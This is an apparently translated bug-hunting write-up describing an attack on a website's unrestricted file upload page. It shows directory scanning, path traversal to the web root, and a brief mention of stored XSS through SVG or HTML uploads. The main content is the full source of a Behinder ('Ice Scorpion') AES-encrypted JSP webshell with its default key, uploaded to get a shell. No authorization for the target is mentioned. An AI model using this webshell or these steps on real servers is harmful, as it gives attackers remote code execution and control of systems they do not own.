Arbitrary file upload vulnerability mining (getshell)
1. Find the subdomain page during vulnerability mining.
2. Scan the directory if there is no content, successfully find filemanager/, click to visit
I was pleasantly surprised when I saw the upload page.
Sure enough, there is an upload function. Click to upload to capture the packet. After testing, it was found that ordinary jsp will be intercepted and Ant Sword cannot connect, so I chose Ice Scorpion Horse to upload because Ice Scorpion Horse defaults to AES encryption.
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*" %>
<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
%><%
if (request.getMethod().equals("POST")) {
String k = "e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/
session.putValue("u", k);
Cipher c = Cipher.getInstance("AES");
c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);
}
%>
But there is no path echo, I see the path, so I try.../upload
You can see that there is a path, after trying.../…/
After accessing it, I found that it happened to be the root path of the website.
Directly try to connect to Ice Scorpion and the connection is successful.
At this point, successfully gethell
Of course, you can also upload svg and html files to form stored XSS. It has been tested and is acceptable. There is no restriction on uploading files here.